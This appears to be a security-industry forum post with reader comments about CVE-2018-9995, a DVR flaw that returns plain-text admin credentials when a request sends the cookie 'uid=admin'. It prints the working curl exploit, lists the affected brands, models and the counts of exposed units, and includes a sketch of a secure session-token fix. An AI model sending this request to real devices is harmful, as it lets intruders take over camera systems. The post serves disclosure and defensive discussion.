Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs

A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is outlined in CVE-2018-9995.

The DVRs affected are manufactured by TBK as well as OEM'd by:

  • CeNova
  • DVR Login
  • HVR Login
  • MDVR Login
  • Night OWL
  • Novo
  • Pulnix
  • QSee
  • Securus
  • XVR 5 in 1

The exploit, tested by IPVM, is a simple curl command:

curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).



The plain text credentials returned from this command granted admin access to the device.

Agree: 2
Informative: 1

opt=user&cmd=list

Obviously they really tried hard to hide this backdoor ;)

Agree: 3
Funny: 2

The key here is probably the cookie...

-H "Cookie: uid=admin"

Like the recent Hikvision cloud exploit, it looks like these cameras are taking the "logged in" user value from the cookie. "You're the admin you say? Come on in!"

If you're going to use cookies, it's trivial to use a simple token. Generate a token on login, let the user store that token in a cookie, and if the user supplies an expired or unrecognized token, force login again. Anything is better than letting the user decide what level of privilege they should have.

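The token approach suggested in the comment above, sketched beside the flawed pattern of trusting a client-supplied uid cookie. This is an added example, not code from the DVR firmware or from any commenter; the cookie name `session`, the 15-minute lifetime, the in-memory session store and the sample credential are assumptions.

```python
import hmac
import secrets
import time

SESSION_TTL = 900  # seconds; assumed lifetime for this sketch
_sessions = {}     # token -> (username, expiry), kept server-side only


def parse_cookies(header):
    """Split a Cookie header into a dict of name -> value."""
    pairs = (p.split("=", 1) for p in header.split(";") if "=" in p)
    return {k.strip(): v.strip() for k, v in pairs}


def user_from_cookie_flawed(header):
    """The flawed pattern: identity is whatever the client claims."""
    return parse_cookies(header).get("uid")


def login(username, password, check_password, now=None):
    """Issue an unguessable token only after the password is verified."""
    if not check_password(username, password):
        return None
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    _sessions[token] = (username, now + SESSION_TTL)
    return token


def user_from_cookie(header, now=None):
    """Return the logged-in user, or None to force a fresh login."""
    now = time.time() if now is None else now
    token = parse_cookies(header).get("session", "")
    entry = _sessions.get(token)
    if entry is None:
        return None            # unrecognized token
    username, expiry = entry
    if now >= expiry:
        del _sessions[token]   # expired token
        return None
    return username


def demo_check_password(username, password):
    """Constructed credential for the example; a real store holds salted hashes."""
    known = {"admin": "correct horse battery staple"}
    expected = known.get(username)
    return expected is not None and hmac.compare_digest(expected, password)
```

The server never reads a privilege level or user name from the cookie; it only looks up the random token in state it created itself at login.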

Do they have a business presence in the US?


TBK is a Spanish company, however OEMs like Q-See and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Costco, and more.

Agree: 1
Informative: 1

John, 

Q-See is OEMing TVT and Dahua, at least for the past few years. 

Night Owl is Hikvision and Raysharp for the past few years as well.

I would be interested to see the models from TBK for these brands.

Informative: 1

There are ~1.5k vulnerable units online in the US, out of ~55k total vulnerable units online worldwide.

The VR4104 and DVR4216 series from TBK are vulnerable. I am not sure what those model numbers are at the OEMs, but will look into it and report back here with anything I find.

Vulnerable Q-See Login:

[Image: DVR_login_4]

Vulnerable Night Owl Login:

[Image: DVR_login_5]

Informative: 1

Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.


Does anyone have the MAC prefix for their devices?

 


Sean - Here is a list of the affected brands and the associated OUIs:

Brands

TBK
CeNova
DVR Login
HVR Login
MDVR Login
Night OWL
Novo
Pulnix
QSee
Securus
XVR 5 in 1


Informative: 2

Amazing! Thanks!


Manufactured by TBK, a Spanish company? Are they really manufactured in a Spanish country?

Agree: 1

Those DVRs were designed and manufactured by Streamax, China.


TBK looks like TVT to me. QSEE often uses TVT.

Agree: 1

This is correct. TBK is actually just a TVT OEM.
